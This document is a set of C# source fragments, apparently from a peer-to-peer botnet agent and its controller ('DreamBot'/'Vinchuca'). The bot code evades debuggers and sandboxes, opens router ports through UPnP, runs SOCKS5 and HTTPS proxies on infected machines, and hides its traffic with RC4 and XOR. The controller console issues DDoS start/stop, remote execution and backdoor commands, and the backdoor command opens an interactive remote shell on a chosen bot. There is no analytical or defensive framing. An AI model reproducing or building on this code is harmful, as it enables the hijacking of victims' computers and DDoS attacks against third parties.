public void UpdatePeer(BotIdentifier botId) { if (_peers.ContainsKey(botId)) { _peers[botId].Touch(); } }
public void Punish(BotIdentifier botId) { if (_peers.ContainsKey(botId)) { _peers[botId].DecreseReputation(); } }
public DreamBotApp(int port, BotIdentifier id) { BotId = id; Logger.Info(0, "DreamBot [id: {0}] listenning on port {1}", BotId, port); _worker = new ClientWorker(); _worker.QueueForever(AntiDebugging.CheckDebugger, TimeSpan.FromSeconds(1)); _worker.QueueForever(AntiDebugging.CheckDebugging, TimeSpan.FromSeconds(0.3)); _peerList = new PeerList(_worker); _peerList.DesparadoModeActivated += DesperateModeActivated; _listener = new MessageListener(port); _listener.UdpPacketReceived += EnqueueMessage; _comunicationManager = new ComunicationManager(_listener, _worker); _peersManager = new PeerManager(_comunicationManager, _peerList, _worker, BotId); _messagesManager = new MessageManager(_peersManager); _messagesManager.Register(0x00, MessageType.Request, typeof(HelloMessage), new HelloMessageHandler(_peerList, _messagesManager), false); _messagesManager.Register(0x01, MessageType.Reply, typeof(HelloReplyMessage), new HelloReplyMessageHandler(_peerList, _messagesManager), true); _messagesManager.Register(0x02, MessageType.Request, typeof(GetPeerListMessage), new GetPeerListMessageHandler(_peerList, _messagesManager), true); _messagesManager.Register(0x03, MessageType.Reply, typeof(GetPeerListReplyMessage), new GetPeerListReplyMessageHandler(_peerList, _messagesManager), true); _messagesManager.Register(0xFF, MessageType.Special, typeof(InvalidMessage), new InvalidMessageHandler(_peerList), false); _socks5 = new Socks5Server(8009); _https = new HttpsProxyServer(8019); //_connectivityTester = new ConnectivityTester(); //_connectivityTester.OnConnectivityStatusChanged += OnConnectivityStatusChanged; }
public Agent(int port, BotIdentifier id) { BotIdentifier.Id = id; Logger.Info("Vinchuca Agent [id: {0}] listenning on port {1}", BotIdentifier.Id, port); _worker = ClientWorker.Instance; _worker.QueueForever(AntiDebugging.CheckDebugger, TimeSpan.FromSeconds(1)); _worker.QueueForever(AntiDebugging.CheckDebugging, TimeSpan.FromSeconds(0.3)); _worker.QueueForever(SandboxDetection.CheckSandboxed, TimeSpan.FromSeconds(1)); _peerList = new PeerList(_worker); _peerList.DesparadoModeActivated += DesperateModeActivated; if (IPAddressUtils.BehingNAT(IPAddressUtils.GetLocalIPAddress())) { var upnpSearcher = new UpnpSearcher(); upnpSearcher.DeviceFound += (s, e) => { PublicIP = e.Device.GetExternalIP(); Logger.Verbose("External IP Address: {0}", PublicIP); try { var externalPort = BotIdentifier.Id.GetPort(); BotIdentifier.EndPoint = new IPEndPoint(PublicIP, externalPort); var device = e.Device; device.CreatePortMap(new Mapping(Protocol.Udp, port, externalPort)); device.CreatePortMap(new Mapping(Protocol.Tcp, port, externalPort + 1)); device.CreatePortMap(new Mapping(Protocol.Tcp, port, externalPort + 2)); } catch (MappingException ex) { Logger.Warn("UPnp - port mapping failed: {0} - {1}", ex.ErrorCode, ex.ErrorText); } finally { upnpSearcher.Stop(); } }; upnpSearcher.Search(); } _listener = new MessageListener(port); _listener.UdpPacketReceived += EnqueueMessage; _communicationManager = new CommunicationManager(_listener, _worker); var peersManager = new PeerManager(_communicationManager, _peerList, _worker); _messagesManager = new MessageManager(peersManager); peersManager.MessageSender = _messagesManager; RegisterMessageHandlers(peersManager); var externPort = BotIdentifier.Id.GetPort(); _socks5 = new Socks5Server(externPort + 1); _https = new HttpsProxyServer(externPort + 2); _connectivityTester = new ConnectivityTester(); _connectivityTester.OnConnectivityStatusChanged += OnConnectivityStatusChanged; }
public void Send(Message message, BotIdentifier botId, ulong correlationId) { var messageId = _messageTypeMap[message.GetType()].MessageId; var payload = message.Encode(); LogMessaging(message, botId, true); _peerManager.Send(messageId, correlationId, 0, payload, botId); }
public static PeerInfo Parse(string line) { var parts = line.Split(new[] { '@', ':' }); var id = BotIdentifier.Parse(parts[0]); var ip = IPAddress.Parse(parts[1]); var port = int.Parse(parts[2]); return(new PeerInfo(id, new IPEndPoint(ip, port))); }
public static void CheckIfAlreadyRunning(BotIdentifier id) { try { var mutexId = string.Format("Global\\{{{0}}}", id); _mutex = new Mutex(true, mutexId); _mutex.ReleaseMutex(); } catch { Environment.Exit(0); } }
public PeerManager(ComunicationManager comunicationManager, PeerList peerList, IWorkScheduler worker, BotIdentifier botId) { _comunicationManager = comunicationManager; _comunicationManager.PackageReceivedEventArgs += PackageReceivedEventArgs; _worker = worker; _botId = botId; _waitingForReply = new ReplyWaitManager(_comunicationManager); _worker.QueueForever(PurgeTimeouts, TimeSpan.FromSeconds(60)); _peerList = peerList; _peerList.BrokenBotDetected += BrokenBotDetected; }
public static void LogMessaging(Message m, BotIdentifier botId, bool sending) { var messageType = m.GetType().Name; var bid = botId.ToString(); Logger.Verbose("[{0}] {1} {2,-24} {3,-5} {4} ", sending ? "S" : "R", sending ? "--->" : "<---", messageType, sending ? "to" : "from", bid.Substring(0, Math.Min(12, bid.Length)) ); }
public void Send(Message message, BotIdentifier botId, ulong correlationId = 0, short ttl = 0) { if (ttl < 0) { return; } var meta = _messageTypeMap[message.GetType()]; var payload = message.Encode(); LogMessaging(message, botId, true); ClientWorker.Instance.Queue(() => _peerManager.Send(meta, correlationId, ttl, payload, botId)); }
public override void DecodePayload(BinaryReader br) { var len = br.ReadInt16(); var peers = new List <PeerInfo>(len); for (int i = 0; i < len; i++) { var botId = new BotIdentifier(br.ReadBytes(BotIdentifier.Size)); var ip = new IPAddress(br.ReadBytes(4)); var port = br.ReadInt32(); var peerInfo = new PeerInfo(botId, new IPEndPoint(ip, port)); peers.Add(peerInfo); } Peers = peers.ToArray(); }
public static void Main(string[] args) { var idbuf = new byte[16]; new Random().NextBytes(idbuf); var id = new BotIdentifier(idbuf); var listenPort = 33333; var peers = new List<PeerInfo>(); foreach (var arg in args) { var v = arg.Substring(1); switch (arg[0]) { case 'p': int.TryParse(v, out listenPort); break; case 'c': foreach (var peerInfo in v.Split(new[]{';'})) { peers.Add(PeerInfo.Parse(peerInfo)); } break; case 'i': id = BotIdentifier.Parse(v); break; } } #if !DEBUG SystemInfo.CheckIfAlreadyRunning(id); AntiDebugging.CheckDebugger(); SandboxDetection.CheckIfSandboxed(); #endif _bot = new DreamBotApp(listenPort, id); _bot.Bootstrap(peers); _bot.Run(); var c = Console.ReadKey(true); while(c.Key != ConsoleKey.Spacebar) { _bot.Debug(c.Key); c = Console.ReadKey(true); } }
public static void Main(string[] args) { var hCmdWindow = GetConsoleWindow(); ShowWindow(hCmdWindow, SwShow); var idbuf = new byte[16]; new Random().NextBytes(idbuf); var id = new BotIdentifier(idbuf); var listenPort = 33333; var peers = new List <PeerInfo>(); foreach (var arg in args) { var v = arg.Substring(1); switch (arg[0]) { case 'p': int.TryParse(v, out listenPort); break; case 'c': foreach (var peerInfo in v.Split(new[] { ';' })) { peers.Add(PeerInfo.Parse(peerInfo)); } break; case 'i': id = BotIdentifier.Parse(v); break; } } agent = new Agent(listenPort, id); agent.Run(); agent.Bootstrap(peers); new ManualResetEvent(false).WaitOne(); }
public void CheckConfigurationFileVersion(short cfgVersion, BotIdentifier botId) { if (cfgVersion > ConfigurationFileVersion) { Logger.Verbose("Updating config file version {0} to {1} from bot {2}", ConfigurationFileVersion, cfgVersion, botId); var port = new Random().Next(33000, 33999); var controllerIp = BotIdentifier.EndPoint.Address; var serverEndpoint = new IPEndPoint(controllerIp, port); var server = new TcpListener(serverEndpoint); server.Start(); var message = new ShareFileMessage { Path = GetConfigFileNameFor(botId), Endpoint = serverEndpoint }; _messageManager.Send(message, botId); var client = server.AcceptTcpClient(); var stream = client.GetStream(); var reader = new StreamReader(stream); var fileContent = reader.ReadToEnd(); client.Close(); server.Stop(); var signer = new Signature(); try { var iosign = fileContent.Length - (2 * Signature.Lenght); var content = fileContent.Substring(0, iosign); var signatureBase64 = fileContent.Substring(iosign); var signature = Convert.FromBase64String(signatureBase64); signer.Verify(Encoding.ASCII.GetBytes(content), signature); File.WriteAllText(ConfigurationFileName, fileContent); ConfigurationFileVersion = cfgVersion; } catch { // ignored } } }
public byte[] EncodeMessage(Message message, BotIdentifier botIdentifier) { return(message.Encode()); }
public PeerInfo(BotIdentifier botId, IPEndPoint endpoint) { BotId = botId; EndPoint = endpoint; LastSeen = DateTimeProvider.UtcNow; }
public override void DecodePayload(BinaryReader br) { TargetBotId = new BotIdentifier(br.ReadBytes(BotIdentifier.Size)); ControllerEndpoint = new IPEndPoint(new IPAddress(br.ReadBytes(4)), br.ReadUInt16()); }
public PeerInfo this[BotIdentifier botId] { get { return(_peers[botId]); } }
internal bool IsRegisteredBot(BotIdentifier botId) { return(_peers.ContainsKey(botId)); }
public void CheckAgentVersion(short botVersion, BotIdentifier botId) { throw new NotImplementedException(); }
internal void Send(MessageMetadata metadata, ulong correlationId, short ttl, byte[] payload, BotIdentifier peerBotId) { if (!_peerList.IsRegisteredBot(peerBotId) && (metadata.MessageId != MessageCode.Syn || metadata.MessageId != MessageCode.AckSyn)) { Logger.Verbose("Cannot send message to unkown {0} bot", peerBotId); return; } var peerInfo = _peerList[peerBotId]; byte[] message; BotHeader header; do { var padding = RandomUtils.NextPadding(); header = new BotHeader { CorrelationId = correlationId == 0 ? RandomUtils.NextCorrelationId() : correlationId, MessageId = (short)metadata.MessageId, PayloadSize = (short)payload.Length, Padding = (short)padding.Length, Ttl = ttl == 0 ? RandomUtils.NextTtl() : ttl }; var preambule = BufferUtils.Concat(header.Encode(), padding); message = BufferUtils.Concat(preambule, payload); } while (!PoW.IsEnough(message, 0, message.Length, metadata.RequiredWork)); if (peerInfo.Handshaked) { message = Aes.Encrypt(message, 0, message.Length, peerInfo.EncryptionKey); } var endPoint = peerInfo.EndPoint; Logger.Verbose("{0}@{1} {2}", header.BotId, endPoint, header.CorrelationId); _communicationManager.Send(endPoint, message); if (correlationId == 0) { WaitingForReply.Add(new Package(endPoint, message, message.Length), header.CorrelationId); } }
public override int Invoke(IEnumerable <string> args) { try { var extra = Options.Parse(args); if (ShowHelp) { Options.WriteOptionDescriptions(CommandSet.Out); return(0); } if (string.IsNullOrEmpty(BotId)) { Console.WriteLine("commands: Missing required argument `--bot=BOT-IDENTIFIER`."); Console.WriteLine("commands: Use `help backdoor` for details."); return(1); } var port = new Random().Next(33000, 33999); var serverEndpoint = new IPEndPoint(IPAddress.Loopback, port); var server = new TcpListener(serverEndpoint); server.Start(); var backdoorMessage = new BackdoorMessage() { TargetBotId = BotIdentifier.Parse(BotId), ControllerEndpoint = new IPEndPoint(IPAddress.Parse(""), port) }; _agent.MessagesManager.Broadcast(backdoorMessage, 6); var client = server.AcceptTcpClient(); var stream = client.GetStream(); var writer = new StreamWriter(stream) { AutoFlush = true }; var reader = new StreamReader(stream); ThreadPool.QueueUserWorkItem(s1 => { var array = new char[1024]; try { int count; while ((count = reader.Read(array, 0, array.Length)) != 0) { Console.Write(new string(array, 0, count)); } } catch (Exception e) { // ignored } }); ConsoleKeyInfo k; var cursorLeft = 0; while (true) { k = Console.ReadKey(true); writer.Write(k.KeyChar); Console.Write(k.KeyChar.ToString()); if (k.Key == ConsoleKey.Enter) { Console.CursorLeft -= cursorLeft; cursorLeft = 0; writer.WriteLine(); } else { cursorLeft++; } } client.Close(); server.Stop(); return(0); } catch (Exception e) { // _repl.Console.WriteLine("commands: {0}", CommandDemo.Verbosity >= 1 ? e.ToString() : e.Message); return(1); } }
public override int Invoke(IEnumerable <string> args) { try { var extra = Options.Parse(args); if (ShowHelp) { Options.WriteOptionDescriptions(CommandSet.Out); return(0); } if (extra.Count == 0) { Console.WriteLine("commands: Missing required argument `BOT-IDENTIFIER`."); Console.WriteLine("commands: Use `help backdoor` for details."); return(1); } var botId = extra[0]; var targetBotId = BotIdentifier.Parse(botId); var peerInfo = _agent.PeerList[targetBotId]; var controllerIp = IPAddressUtils.BehingNAT(peerInfo.EndPoint.Address) ? IPAddressUtils.GetLocalIPAddress() : _agent.PublicIP; var port = new Random().Next(33000, 33999); var serverEndpoint = new IPEndPoint(controllerIp, port); var server = new TcpListener(serverEndpoint); server.Start(); var backdoorMessage = new BackdoorMessage() { TargetBotId = BotIdentifier.Parse(botId), ControllerEndpoint = new IPEndPoint(controllerIp, port) }; _agent.MessagesManager.Broadcast(backdoorMessage, 6); var client = server.AcceptTcpClient(); var stream = client.GetStream(); Console.WriteLine("Connected!"); var writer = new StreamWriter(stream) { AutoFlush = true }; var reader = new StreamReader(stream); ThreadPool.QueueUserWorkItem(s1 => { var array = new char[1024]; try { int count; while ((count = reader.Read(array, 0, array.Length)) != 0) { Console.Write(new string(array, 0, count)); } } catch (Exception e) { // ignored } }); var bgColor = Console.BackgroundColor; var fgColor = Console.ForegroundColor; //Console.BackgroundColor = ConsoleColor.Blue; Console.ForegroundColor = ConsoleColor.Cyan; Console.CursorVisible = true; ConsoleKeyInfo k; var cursorLeft = 0; var cmd = ""; while (cmd != "exit") { k = Console.ReadKey(true); if (k.Key == ConsoleKey.Enter) { Console.CursorLeft -= cursorLeft; cursorLeft = 0; writer.Write('\n'); cmd = ""; } else { cmd += k.KeyChar; writer.Write(k.KeyChar); Console.Write(k.KeyChar.ToString()); cursorLeft++; } } client.Close(); server.Stop(); Console.BackgroundColor = bgColor; Console.ForegroundColor = fgColor; Console.WriteLine("\nbackdoor closed. Good bye, master!"); Console.WriteLine(); return(0); } catch (Exception e) { // _repl.Console.WriteLine("commands: {0}", CommandDemo.Verbosity >= 1 ? e.ToString() : e.Message); return(1); } }
public IPEndPoint this[BotIdentifier botId] { get { return(_peers[botId].EndPoint); } }
internal void Punish(BotIdentifier botId) { _peerList.Punish(botId); }
private string GetConfigFileNameFor(BotIdentifier botId) { return("_tmp" + botId.ToString().Substring(0, 10)); }
public static void Main(string[] args) { var idbuf = new byte[16]; new Random().NextBytes(idbuf); var id = new BotIdentifier(idbuf); var listenPort = 33333; var peers = new List <PeerInfo>(); foreach (var arg in args) { var v = arg.Substring(1); switch (arg[0]) { case 'p': int.TryParse(v, out listenPort); break; case 'c': foreach (var peerInfo in v.Split(new[] { ';' })) { peers.Add(PeerInfo.Parse(peerInfo)); } break; case 'i': id = BotIdentifier.Parse(v); break; } } agent = new Agent(listenPort, id); agent.Run(); agent.Bootstrap(peers); var console = new VirtualConsole(0, 20); ConsolesManager.Instance.SetFocus(console); Console.SetCursorPosition(0, 21); Console.Write(new string('=', Console.BufferWidth)); var repl = new CommandLineReader(console); var suite = new CommandSet("vicha", null, console, console) { "usage: COMMAND [OPTIONS]+.", "Available commands are:", "", // { "v:", "verbosity", (int? v) => Verbosity = v.HasValue ? v.Value : Verbosity+1 }, // Commands may also be specified new DDoSStartCommand(agent, repl), new DDoSStopCommand(agent, repl), new ExecuteCommand(agent, repl), new BackdoorCommand(agent, repl), new AddNodeCommand(agent, repl), new DebugCommand(agent, repl), new Command("clear", "Clear the screen") { Run = x => repl.Clear() }, new Command("exit", "Finished the control seesion and close the agent") { Run = x => Environment.Exit(0) } }; repl.NewCommand += (sender, eventArgs) => suite.Run(eventArgs.Command.Split(new [] { ' ' }, StringSplitOptions.RemoveEmptyEntries)); repl.Run(); }
public void Send(short messageId, ulong correlationId, short ttl, byte[] payload, BotIdentifier botId) { if (!_peerList.IsRegisteredBot(botId)) { return; } var padding = RandomUtils.NextPadding(); var header = new BotHeader { CorrelationId = correlationId == 0 ? RandomUtils.NextCorrelationId() : correlationId, BotId = botId, MessageId = messageId, PayloadSize = (short)payload.Length, Padding = (short)padding.Length, Ttl = ttl == 0 ? RandomUtils.NextTtl() : ttl }; var message = BufferUtils.Concat(header.Encode(), padding); var rc4 = new Rc4(botId.ToByteArray()); rc4.Encrypt(message); var now = new TimeSpan(DateTime.UtcNow.Ticks); var minutes = now.TotalMilliseconds / (1000 * 60); var xor = new Mod2(BitConverter.GetBytes(minutes)); xor.Decrypt(message); var endPoint = _peerList[botId]; Logger.Verbose(3, "{0}@{1} {2}", header.BotId, endPoint, header.CorrelationId); _comunicationManager.Send(endPoint, message); if (correlationId == 0) { _waitingForReply.Add(new Package(endPoint, message), correlationId); } }